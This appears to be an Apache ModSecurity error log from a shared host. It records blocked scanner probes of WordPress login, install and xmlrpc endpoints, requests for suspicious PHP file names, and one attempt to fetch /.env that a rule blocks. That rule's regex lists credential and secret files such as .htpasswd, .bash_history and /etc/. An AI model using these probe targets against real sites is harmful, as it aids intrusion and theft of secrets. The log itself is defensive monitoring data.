[Tue May 26 12:55:01.747969 2026] [security2:error] [pid 461618:tid 461763] [client 194.26.192.99:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "digitalgerminate.com"] [uri "/wp-admin/install.php"] [unique_id "ahVKzVyiSlSCHr1fdr244QAAlFE"]
[Tue May 26 12:55:01.925436 2026] [security2:error] [pid 461618:tid 461629] [remote 194.26.192.99:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVKzVyiSlSCHr1fdr247QABAAo"]
[Tue May 26 12:55:01.925692 2026] [security2:error] [pid 461618:tid 461871] [client 194.26.192.99:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "digitalgerminate.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVKzVyiSlSCHr1fdr247QABAAo"]
[Tue May 26 12:55:02.062953 2026] [security2:error] [pid 461618:tid 461832] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKzVyiSlSCHr1fdr243QAAANk"]
[Tue May 26 12:55:02.204567 2026] [security2:error] [pid 461618:tid 461766] [client 74.249.173.207:4465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/xmlrpc.php"] [unique_id "ahVKzVyiSlSCHr1fdr247gAAAJc"]
[Tue May 26 12:55:04.087926 2026] [security2:error] [pid 461618:tid 461760] [client 74.249.173.207:4422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVK0FyiSlSCHr1fdr25LQAAAJE"]
[Tue May 26 12:55:04.834947 2026] [security2:error] [pid 461618:tid 461868] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK0FyiSlSCHr1fdr25OQAAAP0"]
[Tue May 26 12:55:05.120767 2026] [security2:error] [pid 461618:tid 461750] [client 157.20.138.61:61380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK0VyiSlSCHr1fdr25TQAAAIc"]
[Tue May 26 12:55:05.120944 2026] [security2:error] [pid 461618:tid 461750] [client 157.20.138.61:61380] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK0VyiSlSCHr1fdr25TQAAAIc"]
[Tue May 26 12:55:07.614656 2026] [security2:error] [pid 461618:tid 461862] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK01yiSlSCHr1fdr25hQAAAPc"]
[Tue May 26 12:55:09.089901 2026] [security2:error] [pid 461618:tid 461806] [client 176.65.139.234:62754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "avprealty.com"] [uri "/.env"] [unique_id "ahVK1VyiSlSCHr1fdr25swAAAL8"]
[Tue May 26 12:55:10.252508 2026] [security2:error] [pid 461618:tid 461820] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK1VyiSlSCHr1fdr25ygAAAM0"]
[Tue May 26 12:55:12.775933 2026] [security2:error] [pid 461618:tid 461797] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK2FyiSlSCHr1fdr26BQAAALY"]
[Tue May 26 12:55:13.963700 2026] [security2:error] [pid 461618:tid 461756] [client 86.45.127.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK2VyiSlSCHr1fdr26MQAAAI0"]
[Tue May 26 12:55:15.256342 2026] [security2:error] [pid 461618:tid 461818] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK2lyiSlSCHr1fdr26XAAAAMs"]
[Tue May 26 12:55:15.748200 2026] [security2:error] [pid 461618:tid 461753] [client 157.20.138.61:61739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK21yiSlSCHr1fdr26bgAAAIo"]
[Tue May 26 12:55:15.748340 2026] [security2:error] [pid 461618:tid 461753] [client 157.20.138.61:61739] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK21yiSlSCHr1fdr26bgAAAIo"]
[Tue May 26 12:55:16.000669 2026] [security2:error] [pid 461618:tid 461799] [client 74.249.173.207:4419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahVK21yiSlSCHr1fdr26eAAAALg"]
[Tue May 26 12:55:17.042790 2026] [security2:error] [pid 461618:tid 461816] [client 103.167.35.178:49292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.35.167.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php"] [unique_id "ahVK3FyiSlSCHr1fdr26hwAAAMk"]
[Tue May 26 12:55:18.194455 2026] [security2:error] [pid 461618:tid 461821] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK3VyiSlSCHr1fdr26ogAAAM4"]
[Tue May 26 12:55:20.066984 2026] [security2:error] [pid 461618:tid 461829] [client 74.7.241.165:36346] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.powersociety.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVK4FyiSlSCHr1fdr265AAA1gQ"]
[Tue May 26 12:55:20.858550 2026] [security2:error] [pid 461618:tid 461814] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK4FyiSlSCHr1fdr268AAAAMc"]
[Tue May 26 12:55:20.877923 2026] [security2:error] [pid 461618:tid 461800] [client 74.249.173.207:4738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahVK4FyiSlSCHr1fdr27AwAAALk"]
[Tue May 26 12:55:24.214704 2026] [security2:error] [pid 461618:tid 461869] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK41yiSlSCHr1fdr27UwAAAP4"]
[Tue May 26 12:55:25.069061 2026] [security2:error] [pid 461618:tid 461875] [client 34.236.185.101:60020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "www.bloggertarget.com"] [uri "/web-design-and-hosting-services/"] [unique_id "ahVK5VyiSlSCHr1fdr27dAAAAQQ"]
[Tue May 26 12:55:26.471977 2026] [security2:error] [pid 461618:tid 461807] [client 157.20.138.61:62097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK5lyiSlSCHr1fdr27lQAAAMA"]
[Tue May 26 12:55:26.472092 2026] [security2:error] [pid 461618:tid 461807] [client 157.20.138.61:62097] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK5lyiSlSCHr1fdr27lQAAAMA"]
[Tue May 26 12:55:27.030275 2026] [security2:error] [pid 461618:tid 461779] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK5lyiSlSCHr1fdr27pQAAAKQ"]
[Tue May 26 12:55:27.322574 2026] [security2:error] [pid 461618:tid 461819] [client 74.249.173.207:4772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/kbfr.php"] [unique_id "ahVK51yiSlSCHr1fdr27tAAAAMw"]
[Tue May 26 12:55:27.367684 2026] [security2:error] [pid 461618:tid 461839] [client 172.225.181.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVK51yiSlSCHr1fdr27sgAAAOA"]
[Tue May 26 12:55:27.973942 2026] [security2:error] [pid 461618:tid 461835] [client 34.138.162.90:56947] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahVK51yiSlSCHr1fdr27xwAAANw"]
[Tue May 26 12:55:28.243605 2026] [security2:error] [pid 461618:tid 461864] [client 34.138.162.90:56947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.162.138.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVK6FyiSlSCHr1fdr270AAAAPk"]
[Tue May 26 12:55:28.731560 2026] [security2:error] [pid 461618:tid 461844] [client 34.138.162.90:64700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVK6FyiSlSCHr1fdr274QAAAOU"]
[Tue May 26 12:55:29.374760 2026] [security2:error] [pid 461618:tid 461826] [client 34.138.162.90:62309] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVK6VyiSlSCHr1fdr276AAAANM"]
[Tue May 26 12:55:29.845513 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK6VyiSlSCHr1fdr276wAAALM"]
[Tue May 26 12:55:30.073058 2026] [security2:error] [pid 461618:tid 461792] [client 34.138.162.90:60017] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVK6lyiSlSCHr1fdr28AAAAALE"]
[Tue May 26 12:55:30.794579 2026] [security2:error] [pid 461618:tid 461843] [client 34.138.162.90:64784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVK6lyiSlSCHr1fdr28HAAAAOQ"]
[Tue May 26 12:55:31.237645 2026] [security2:error] [pid 461618:tid 461795] [client 34.138.162.90:55590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVK61yiSlSCHr1fdr28JgAAALQ"]
[Tue May 26 12:55:31.515748 2026] [security2:error] [pid 461618:tid 461871] [client 34.138.162.90:62182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVK61yiSlSCHr1fdr28LgAAAQA"]
[Tue May 26 12:55:31.749663 2026] [security2:error] [pid 461618:tid 461773] [client 173.239.214.67:57141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.214.239.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wp-login.php"] [unique_id "ahVK61yiSlSCHr1fdr28KQAAAJ4"]
[Tue May 26 12:55:31.920122 2026] [security2:error] [pid 461618:tid 461807] [client 34.138.162.90:60857] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVK61yiSlSCHr1fdr28NgAAAMA"]
[Tue May 26 12:55:32.022688 2026] [security2:error] [pid 461618:tid 461846] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK61yiSlSCHr1fdr28MQAAAOc"]
[Tue May 26 12:55:32.300174 2026] [security2:error] [pid 461618:tid 461765] [client 34.138.162.90:53791] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVK7FyiSlSCHr1fdr28SgAAAJY"]
[Tue May 26 12:55:32.629058 2026] [security2:error] [pid 461618:tid 461788] [client 34.138.162.90:52813] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVK7FyiSlSCHr1fdr28VQAAAK0"]
[Tue May 26 12:55:32.968256 2026] [security2:error] [pid 461618:tid 461844] [client 34.138.162.90:60112] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVK7FyiSlSCHr1fdr28YAAAAOU"]
[Tue May 26 12:55:33.286802 2026] [security2:error] [pid 461618:tid 461859] [client 34.138.162.90:59810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ivwellnessresources.org"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVK7VyiSlSCHr1fdr28bAAAAPQ"]
[Tue May 26 12:55:34.827303 2026] [security2:error] [pid 461618:tid 461826] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK7lyiSlSCHr1fdr28ggAAANM"]
[Tue May 26 12:55:35.015456 2026] [security2:error] [pid 461618:tid 461825] [client 209.146.63.66:56262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.63.146.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVK7lyiSlSCHr1fdr28iQAAANI"]
[Tue May 26 12:55:36.669184 2026] [security2:error] [pid 461618:tid 461867] [client 74.249.173.207:4755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahVK8FyiSlSCHr1fdr28uwAAAPw"]
[Tue May 26 12:55:36.822808 2026] [security2:error] [pid 461618:tid 461726] [remote 31.24.44.107:44610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVK8FyiSlSCHr1fdr28ugAApWs"]
[Tue May 26 12:55:36.984826 2026] [security2:error] [pid 461618:tid 461851] [client 157.20.138.61:62451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK8FyiSlSCHr1fdr28xgAAAOw"]
[Tue May 26 12:55:36.984969 2026] [security2:error] [pid 461618:tid 461851] [client 157.20.138.61:62451] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK8FyiSlSCHr1fdr28xgAAAOw"]
[Tue May 26 12:55:37.564478 2026] [security2:error] [pid 461618:tid 461820] [client 74.249.173.207:4650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/defaults.php"] [unique_id "ahVK8VyiSlSCHr1fdr281gAAAM0"]
[Tue May 26 12:55:40.830341 2026] [security2:error] [pid 461618:tid 461865] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK9FyiSlSCHr1fdr29MwAAAPo"]
[Tue May 26 12:55:43.717676 2026] [security2:error] [pid 461618:tid 461758] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK91yiSlSCHr1fdr29nwAAAI8"]
[Tue May 26 12:55:43.979641 2026] [security2:error] [pid 461618:tid 461789] [client 74.249.173.207:4635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahVK91yiSlSCHr1fdr29tAAAAK4"]
[Tue May 26 12:55:46.158914 2026] [security2:error] [pid 461618:tid 461801] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK-VyiSlSCHr1fdr295gAAALo"]
[Tue May 26 12:55:47.301555 2026] [security2:error] [pid 461618:tid 461769] [client 23.226.213.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVK-lyiSlSCHr1fdr2-AQAAAJo"]
[Tue May 26 12:55:47.341299 2026] [security2:error] [pid 461618:tid 461821] [client 74.249.173.207:4643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahVK-1yiSlSCHr1fdr2-GQAAAM4"]
[Tue May 26 12:55:47.442858 2026] [security2:error] [pid 461618:tid 461634] [remote 47.128.96.180:54272] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/robots.txt"] [unique_id "ahVK-1yiSlSCHr1fdr2-HQAAig8"]
[Tue May 26 12:55:47.754553 2026] [security2:error] [pid 461618:tid 461872] [client 157.20.138.61:62864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK-1yiSlSCHr1fdr2-KAAAAQE"]
[Tue May 26 12:55:47.754716 2026] [security2:error] [pid 461618:tid 461872] [client 157.20.138.61:62864] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVK-1yiSlSCHr1fdr2-KAAAAQE"]
[Tue May 26 12:55:48.699365 2026] [security2:error] [pid 461618:tid 461830] [client 157.45.204.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK_FyiSlSCHr1fdr2-OQAAANc"]
[Tue May 26 12:55:49.134204 2026] [security2:error] [pid 461618:tid 461842] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK_FyiSlSCHr1fdr2-SgAAAOM"]
[Tue May 26 12:55:51.217881 2026] [fcgid:warn] [pid 461618:tid 461838] (70014)End of file found: [client 66.132.195.101:1718] mod_fcgid: can't get data from http client
